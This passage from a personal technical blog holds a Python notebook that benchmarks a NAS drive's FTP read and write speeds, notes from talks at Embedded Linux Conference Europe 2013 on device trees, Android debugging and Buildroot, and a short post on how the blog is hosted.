        dat = self.buf[self.bufindex:self.bufindex + i]
        end = self.bufindex + i
        while end > self.bufsize:
            end -= self.bufsize
            dat += self.buf[:end]
        self.bufindex = end
        return dat
    def read(self, i=8096):
        if self.limit is None:
            return self.readloop(i)
        if self.fileindex >= self.limit:
            return bytes()
        if self.fileindex + i > self.limit:
            dat = self.readloop(self.limit - self.fileindex)
            self.fileindex = self.limit
            return dat
        self.fileindex += i
        return self.readloop(i)

def testreadcbuf():
    f = CustomBuffer(2548)
    assert(len(f.read(2048)) == 2048)
    assert(len(f.read()) == 500)

testreadcbuf()

def testcbuf(limit=None):
    f = CustomBuffer(limit)
    l = 0
    start = time.perf_counter()  # time.clock() was removed in Python 3.8
    for i in range(10000):
        l += len(f.read())
    end = time.perf_counter()
    speed = l/(end-start)
    print("We generated %d bytes in %f s %d B/s"%(l, end-start, speed))

testcbuf()

We generated 80960000 bytes in 0.780000 s 103794871 B/s

That's more in line with what we need.

The FTP stuff

import ftplib
from ftpconfig import config, config_example # ftp credentials, etc

print(config_example)

{'password': 'verylongandcomplicatedpassword', 'host': '192.168.1.254', 'path': '/HD/', 'username': 'boitegratuite'}

def ftpconnect():
    ftp = ftplib.FTP(config['host'])
    ftp.login(config['username'], config['password'])
    ftp.cwd(config['path'])
    return ftp

def transfer_rate(prev_stamp, now, blocksize):
    diff = now - prev_stamp
    rate = blocksize/(diff*2**20) # store in MiB/s directly
    return [now, rate]

def store(size=2**25, blocksize=2**20):
    values = []

    def watch(block):
        t2 = time.perf_counter()
        values.append(transfer_rate(t1[0], t2, len(block)))
        t1[0] = t2

    ftp = ftpconnect()
    buf = CustomBuffer(size)
    t1 = [time.perf_counter()]
    try:
        ftp.storbinary("STOR filler", buf, blocksize=blocksize, callback=watch)
        ftp.close()
    except ConnectionResetError:
        print("Connection severed by peer")
    except Exception as e:
        print("Transfer interrupted:", e)


    return values

values = store(2**27)

Now let's plot those values!

%pylab inline
import matplotlib.pyplot as plt
import numpy as np

a = np.array(values).transpose()
plt.plot(a[0], a[1])
plt.ylabel("rate (MiB/s)")
plt.xlabel("time (s)")
plt.show()

Welcome to pylab, a matplotlib-based Python environment [backend: module://IPython.zmq.pylab.backend_inline].
For more information, type 'help(pylab)'.

Ok, we have what we wanted: we can measure the write speeds.

Now let's check read speeds.

def reread(blocksize=2**20):
    values=[]
    verif = CustomBuffer()
    i = [0]
    def watch(block):
        t2 = time.perf_counter()
        values.append(transfer_rate(t1[0], t2, len(block)))
        dat = verif.read(len(block))
        if dat != block:
            print("ERROR !!!! Data read isn't correct at block", i[0])
        t1[0] = t2
        i[0] += 1

    ftp = ftpconnect()
    t1 = [time.perf_counter()]
    try:
        ftp.retrbinary("RETR filler", blocksize=blocksize, callback=watch)
        ftp.close()
    except Exception as e:
        print("Transfer interrupted:", e)

    return values

def plot_transfer_speed(data, title):
    def average(arr, n):
        end =  n * (len(arr)//n)
        return np.mean(arr[:end].reshape(-1, n), 1)

    a = np.array(data).transpose()
    a0 = average(a[0], max(1, len(a[0])//300))
    a1 = average(a[1], max(1, len(a[1])//300))
    lines = plt.plot(a0, a1)
    #plt.setp(lines, aa=True)
    plt.gcf().set_size_inches(22, 10)
    plt.ylabel("MiB/s")
    plt.xlabel("seconds")
    plt.title(title)
    plt.show()


rval = reread()

plot_transfer_speed(rval, "Read speed")

We have all the pieces now. Let's do the filling and plot the data.

# About 230 GiB is the effective size of the disk (almost 250 GB)
val = store(230*2**30, 10*2**20)

Connection severed by peer

plot_transfer_speed(val, "Write speed")

rval = reread(10*2**20)

plot_transfer_speed(rval, "Read speed")

That's it !

We could also plot the read speed against the disk byte index instead of time, which would maybe be more interesting. This is left as an exercise for the reader.

Regarding the data, it's far from what we could get with ATA SMART (using smartctl or skdump/sktest), but it's interesting nonetheless. We can see the read speed falls sometimes, which may be indicative of a localized hard drive problem.

What does not appear here is that I ran the tests multiple times to make sure the data is correct. And both the read and write are long, multi-hour tests.

Also, the simple fact of running a write test may fix an existing problem, by making the disk's firmware aware of the existence of bad blocks. This is amplified by the fact that I ran the tests multiple times.

Finally, what could be improved is having a better way to display a high number of data points. I've used here the average method, which might not show how low the read/write speed can go locally. Maybe displaying the data using a vector format would be better (svg, python-chaco ?).
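
One possible way around this, sketched below under assumptions, is to keep the minimum and maximum of each bucket next to its mean, so that a short local drop survives the downsampling. The function bucket_stats is hypothetical and is not used in the notebook above; it takes a plain list of rates in MiB/s.

```python
def bucket_stats(rates, buckets=300):
    """Split rates into at most `buckets` chunks.

    Returns one (min, mean, max) tuple per chunk, in order.
    """
    if not rates:
        return []
    size = max(1, -(-len(rates) // buckets))  # ceiling division
    stats = []
    for start in range(0, len(rates), size):
        chunk = rates[start:start + size]
        stats.append((min(chunk), sum(chunk) / len(chunk), max(chunk)))
    return stats


for low, mean, high in bucket_stats([10, 10, 0.3, 10], buckets=2):
    print(low, mean, high)
```

The minimum and maximum could then be drawn as a band around the mean line, for instance with matplotlib's fill_between.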

Regarding the decision to dispose of the hard drive or the NAS, I think I'll keep it for now until it dies, but I'll start putting my data on an external HDD (plugged to the ISP box), and only trust the internal hard drive with low priority stuff like the occasional video recording.

Embedded Linux Conference Europe 2013 notes

2013-10-30T00:00:00+01:00

So I was in Edinburgh this year, and I took notes as I usually do. These are intended for personal consumption (do not expect LWN-style reports), but as more people were asking me to share them, I thought why not do it in public?

Embedded Linux timeline

by Chris Simmonds

Busybox was started by Bruce Perens to solve the floppy installation problem. The first Linux Router was described in "Arlan Wireless Howto".

Linux gained portability to other architectures over time:

1995: MIPS
1996: m68k, ppc
1998: m68k Dragon Ball Palm Pilot : creation of uClinux (no mmu)
1999: ARM

Flash memory support was added by David Woodhouse in 1999 (MTD layer), then JFFS by AXIS for their IP cameras.

Devices

Things really started in 1999: AXIS IP camera, TiVo DVR, Kerbango Internet Radio (3Com). Lots of media coverage at that time.

Companies sprang up to service embedded linux: Timesys, MontaVista, Lineo, Denx.

The handhelds.org project aimed at porting linux to the Compaq iPaq H3600. Cross-compiling being a pain in the arse, they had a cluster of ~16 iPaqs to compile code.

In 2001, there was the infamous Unobtainium : handset prototype at Compaq based on iPaq hardware with GSM/CDMA/Wifi/Bluetooth, camera, accelerometer, 1GiB of storage: it was really the first smartphone prototype. Never shipped.

At the same time, Sharp made the Zaurus running Linux 2.4.10 (software made by Lineo).

In 2003, Motorola made the A760 handset, the first Linux handset (MontaVista). In 2005, Nokia made the 770, the first Internet Tablet running Maemo Linux.

Buildtools and software

In 2001 buildroot was created from the needs of the uClinux project: it's still the oldest and simplest build system. Then OpenEmbedded in 2003. Then in 2004 Poky Linux based on OE by OpenedHand, then Yocto. In my opinion Chris has a narrow view of the build systems choice (what about Debian?)

Real-time was at first achieved with sub-kernels, like Xenomai. Then Native Real-time : Linux/RT 1.0 by Timesys in 2000. Then the voluntary preempt patch (Ingo Molnar & Andrew Morton). Robert Love kernel preemption patch in 2001. In 2003 Linux 2.6 includes voluntary preempt. In 2005 PREEMPT_RT was started, in 2013, not all of it is merged yet.

In the end: Linux is the "default" embedded OS.

How not to write x86 platform drivers

by Darren Hart

This talk was mostly feedback from getting the Minnowboard mainlined properly.

At Intel, a platform is a CPU + chipset, or a SoC. In Linux, it represents things that are not on a real bus, or things that cannot be enumerated, leading to board-file drivers.

The Minnowboard uses a 32-bit UEFI firmware. It is one of the first designs to make use of all Queensbay (Intel SoC) GPIOs. The UART clock is special (50 MHz). It has a low-cost Ethernet PHY with no EEPROM for MAC addresses. The Minnowboard is a dynamic baseboard, which is very different from what Intel usually does: it supports daughter cards.

There are three main sources of GPIOs on this board (5 core, 8 suspend, 12 pch), 4 user buttons, 2 user LEDs, phy reset, then expansion GPIOs.

Board files

MinnowBoard used board files at first because they are simple to use.

Those were rejected. Why ?

not automatically enumerated and loaded
adds maintenance
independent drivers had to be board aware

All this leads to "evil" vendor trees.

UART clock is firmware dependent. Previous code used DMI detection, which isn't nice.

Ethernet is complicated: aggressive power saving means you must wake it up on open. How to ID the PHY? You could use SMBIOS/DMI, DT, ACPI; in the end PCI subsystem IDs were used. It is initialized with platform_data.

The MAC: no EEPROM, so had to solve how to get a MAC. Was done in firmware in the end: read the SPI flash, then write PCI registers.

To preserve the platform one should not create vendor trees. The complexity of core kernel vs drivers is inverted: core kernel has simple primitives, but complex algorithms. Drivers are the opposite: simple to understand, but hard to organize and fit together.

GPIO, take 2: ACPI 5.0

A lot of things can be done with the new ACPI standard, like identify GPIO resources. You can't do keybindings, default trigger, etc. Some vendors (like Apple) do already, but with their own proprietary additions.

One needs to write ASL for the DSDT. You might want to have dictionaries to describe your hardware, which need to be standardized. Right now ACPI reserved methods are used (_PRP).

Device trees for dummies

by Thomas Petazzoni (Slides)

Before DT, all the information was inside the kernel. Little information in ATAGS. Now all information is in DT.

Device Tree is a tree data structure to describe hardware that cannot be enumerated. You compile a DTS (source) into a DTB (binary). On ARM, all DTS are in arch/arm/boot/dts and automatically compiled for your board. Device Tree bindings are the "standard" for how you should describe the hardware using the DT language, and what the driver understands. All bindings should be documented and reviewed. DT should not describe configuration, just hardware layout. The problem isn't solved yet for configuration.

The talk had a lot of nice syntax examples to learn how to write DTS. For example, Thomas explained the importance of compatible strings, which are used to match a DTS device node with a driver.
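
The matching idea can be sketched like this. It is a simplified model and not the kernel's implementation: the driver table, the driver names and the "vendor,uart-v2" string are hypothetical, and the sketch assumes the node lists its compatible strings from most specific to most generic.

```python
# Hypothetical driver table: each driver lists the compatible strings it handles.
DRIVERS = {
    "vendor-uart-v2-driver": ["vendor,uart-v2"],
    "generic-8250-driver": ["ns16550a", "ns8250"],
}


def match_driver(node_compatible, drivers=DRIVERS):
    """Return the driver matching the earliest compatible string of the node."""
    for compatible in node_compatible:  # most specific string first
        for driver, supported in drivers.items():
            if compatible in supported:
                return driver
    return None  # no driver claims this node


# A node declaring a specific string plus a generic fallback.
print(match_driver(["vendor,uart-v2", "ns16550a"]))
```

A node whose specific string is unknown to every driver still binds through its generic fallback, which is why nodes usually list both.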

Should DT be an ABI ? Hard question. While it was the original idea, maybe it shouldn't. Current discussions seem to want to relax the stable ABI rule.

Use case power management

by Patrick Titiano (Slides)

First rule about PM: shutdown anything not used. You need to track running power resources: it starts with the clock tree.

Things to monitor:

C-states/idle states stats.
Operating point statistics
CPU & HW load
memory bandwidth : most often a bottleneck

You need to instrument both software and hardware. It means you need resistor measurement points on the PCB, and temperature sensors. You need to automate everything, otherwise you're not comparing apples to apples. All measurements should be automated to be easily reproduced.

You need to have a power model of your raw SoC consumption and characteristics, then you need to assess this model to verify that the target is realistic.

Voltage is more important than frequency. It's easier to reduce consumption than to find better way to dissipate energy.
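
As background for the first claim (this is the usual first-order model of CMOS dynamic power, not something taken from the slides), with $\alpha$ the activity factor, $C$ the switched capacitance, $V$ the supply voltage and $f$ the clock frequency:

```latex
P_{\mathrm{dyn}} \approx \alpha \, C \, V^{2} f
\qquad\Rightarrow\qquad
\frac{P_{\mathrm{dyn}}(0.9\,V,\ f)}{P_{\mathrm{dyn}}(V,\ f)} = 0.9^{2} = 0.81,
\qquad
\frac{P_{\mathrm{dyn}}(V,\ 0.9\,f)}{P_{\mathrm{dyn}}(V,\ f)} = 0.9
```

Under this model, lowering the voltage by 10% saves about 19% of dynamic power, while lowering the frequency by 10% saves only 10%.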

Battery is king. You need a full system view, because you should optimize the biggest offenders first. Take care of inter-dependent stuff.

Android debugging tools

by Karim Yaghmour (Slides)

Android usually runs on an SoC. It uses bionic, a different libc, and it has a Hardware Abstraction Layer that allows proprietary drivers in userspace. Toolbox is a lesser busybox clone under a BSD license.

Binder is a standard component, an object IPC, that almost defines the Android system. Every system service uses it.

To debug, it's handy to load AOSP in eclipse. You can load all the OS classes and apps in the editor to be able to trace anything and browse AOSP while seeing classes, call chains, etc. It's more powerful for browsing and live debugging than common editors. You still have to build AOSP by hand (type make/lunch) to generate an image.

A few tools:

latencytop, schedtop, etc.
dumpsys
service
logcat
dumpstate (root app), bugreport : dumps system state (in /proc, etc.)
watchprop

Logging goes through the logger driver.

Interfaces with the system:

start/stop : stops zygote, which means you can shutdown/start the interface and all the java stuff
service call statusbar {1,2,5 s16 alarm_clock i32 0} : you can call methods directly that are defined in an aidl file, by using their implicit sequence number. It's useful to bypass the java framework and call the services directly. see in android/os/IPowerManager.aidl for example, or android/internal/statusbar/IStatusBar.aidl for the previous example
am : very powerful tool to call intents, e.g. am start -a android.intent.action.VIEW -d http://webpage.com
pm : calls to the package manager
wm : calls to the window manager

When working with AOSP sources, source build/envsetup.sh, it has very handy functions, like:

godir: jumps to a dir a file is in
mm : builds the modules in the current directory
jgrep/cgrep/resgrep : grep for specific files (java/c/resource)
croot : jump up to aosp root

Take care when working with AOSP, it's BIG (about 8GB)

When debugging, you have to use a different debugger depending on the use case:

ddms for dalvik level stuff
gdb/gdbserver for HAL stuff
JTAG for kernel

DDMS talks JDWP (Java Debug Wire Protocol). Use the one from AOSP, not eclipse. It's very powerful to debug (java) system processes live.

gdbserver: you have to configure your app's Android.mk to have -ggdb, and disable stripping. You also have to do port forwarding with adb in order to access gdbserver:

adb forward tcp:2345 tcp:2345

You can use the prebuilt arm-eabi-gdb, but multi-threading might not be supported.

logging

logcat works
ftrace is supported through systrace
atrace (device dependent ?)
perf is not well supported on ARM

Embedded build systems showdown

A nice panel, where we had representatives of different build systems:

DIY : Tim Bird, Sony
Android : Karim Yaghmour, Opersys
Buildroot : Thomas Petazzoni, Free Electrons
Yocto : Jeff Osier-Mixon, Intel

It was very friendly. The takeaway is that each system addresses different use cases. Yocto is big-company friendly, because it has metadata and licence management built-in. Tim Bird said he had a personal preference for Buildroot as a developer, although a division of his company recently switched to Yocto for its projects.

Karim's opinion was that although Android wasn't community friendly and couldn't integrate with anything external, it was king in terms of market traction, and that it might be the most used system in any kind of embedded device in 4 to 5 years.

Best practices for long-term support and security of the device-tree

by Alison Chaiken (Slides at Author's)

DTs make life a bit easier, although there are pitfalls. Best practices could help with that matter.

Updates are hard without DT. How about with DT ? Should you update the DTB ?

DTs are supposed to be for HW description, but there are already many configuration items in DT: MTD partition tables, boot device selection, pinmux. Alison gave an example about automotive: battery technology is evolving, which would allow updating an electric car's battery. Cars have a lot of processors; e.g. the 2014 Mercedes S-Class will have 200 MCUs on Ethernet, CAN-FD and LIN.

One thing to be careful about is Kconfig and DTS matching.

One pitfall you might hit is unintentionally breaking the DT or a device by changing something in a driver or another device. One example is Koen Kooi's post, which said you might blow an HDMI transceiver on some board if you boot with micro SD, because micro SD uses a higher voltage by default.

You can use .its to bundle DTS, kernel and other blobs in one .itb file. Support was added in u-boot to sign .itbs by ChromeOS engineers.

One option floating around, presented by Pantelis, is to use DTS runtime overlays as an update method, similar to unionfs.

DTS schema validator looks like a good thing to have, like Stephen Warren's very recent proposal.

Android on a non-mobile embedded system

by Arnout Vandecapelle

The main motivation is the reduced time to market, and the wealth of available app developers.

It's interesting because it's still linux, but there are few differences (bionic libc, special build system)

My own impressions: lots of generic stuff, from someone who just recently went into android. Like most of this stuff, doesn't come from Google, so it has little "new" information in it. It was a nice conference if you've never heard of AOSP and have only been using other embedded distros/build systems.

BuildRoot : What's new ?

by Peter Korsgaard

BuildRoot

BuildRoot is an Embedded Linux build system. It's one of the oldest out there, and is fairly well documented. It has an active community. It's relatively simple, and that's a focus of the project to Keep It Simple (Stupid). For example, there's no binary package management.

It's Kconfig-based for configuration, and uses make for building.

Buildroot is package-based: a build simply runs the build of every selected package, which makes it a meta build system. A package is composed of:

a config (in Kconfig format) for dependencies, description, etc. You need to include this config under the parent config option.
a makefile (Package.mk) with the build steps
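
As a rough illustration of the makefile half, here is a minimal sketch for a hypothetical `hello` package. The package name, version, download URL and license values are all made up for the example. The variable names and the `generic-package` infrastructure are the ones described in the Buildroot manual, but check the manual for your Buildroot version. The matching config file would declare a `BR2_PACKAGE_HELLO` option.

```make
# package/hello/hello.mk (hypothetical package, for illustration only)

# Where to fetch the sources from (made-up URL and version)
HELLO_VERSION = 1.0
HELLO_SOURCE = hello-$(HELLO_VERSION).tar.gz
HELLO_SITE = http://example.com/downloads

# License metadata, collected by the license compliance tooling
HELLO_LICENSE = GPL-2.0+
HELLO_LICENSE_FILES = COPYING

# Build step: cross-compile in the extracted source directory
define HELLO_BUILD_CMDS
	$(MAKE) $(TARGET_CONFIGURE_OPTS) -C $(@D)
endef

# Install step: copy the resulting binary into the target rootfs
define HELLO_INSTALL_TARGET_CMDS
	$(INSTALL) -D -m 0755 $(@D)/hello $(TARGET_DIR)/usr/bin/hello
endef

# Expand the variables above into actual make rules
$(eval $(generic-package))
```

The package only declares what is specific to it (source location, build and install commands); the shared infrastructure takes care of downloading, extracting and ordering the steps.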

Buildroot uses git for its source code; patches are posted on the mailing list and managed in Patchwork.

Buildroot activity has been growing over the years: more emails on the mailing list (~1000/month), more contributors (30-40 each month). Developer days are held twice a year (this year at FOSDEM and ELCE).

Buildroot is used in many products (Barco, Google Fiber) and SDKs (Atmel, Synopsys, Cadence, Imagination…).

What's new ?

It supports more architectures (ARC, Blackfin, Microblaze, Xtensa…), and the variant support has been improved (ARM softfp/hardfp/neon…), as well as the nommu support.

Buildroot now supports more toolchain options: several C libraries (glibc, eglibc, uClibc) and external toolchains.

Buildroot has 30% more packages than last year. A lot of stuff has been added (gstreamer, EFL, wayland, systemd, perf, python3, nodejs…). A GSoC student worked on adding ARM proprietary GPU and video drivers support.

QA has been improved as well, with continuous integration/regression testing. The development cycle is now 3 months, with 1 month of stabilization.

License compliance support has been added: every package should declare a license, and "make legal-info" generates the material needed for compliance.

There's a new Eclipse CDT plugin. Popular boards got their own defconfigs to make getting started easier.

A lot of configuration options were added to menuconfig, including new options to add a rootfs overlay or last-second hook scripts.

Upcoming work includes external package overlays, SELinux support, updated systemd/udev, and whatever else gets submitted.

Hello, World!

2013-10-20T00:00:00+02:00

Update: I updated the information below with the 2020 tech.

So I finally did it. You're reading it right now. My personal website/blog.

I should be posting here about things that cross my mind as well as various projects I've been working on. And maybe even new projects I haven't even started yet.

The design

First of all, kudos to Pascal Navière, a very talented web designer who did the design of this site (CSS, DOM structure, etc.), which I then modified. All bugs are therefore my own additions.

The tech

The DNS you used to access this website is hosted by Gandi. The website itself resides at OVH, who used to sell the world's cheapest VPS (they're currently out of stock for all their products, but I won't go into that). The SSL certificate is provided by StartSSL.

This VPS runs Debian Wheezy, with nginx serving the actual pages. The pages are all old-school static HTML(5), generated by Pelican.

On my machine, Pelican runs under Python 3.3, in a venv where distribute was installed. The content is edited with vim on Fedora 19.
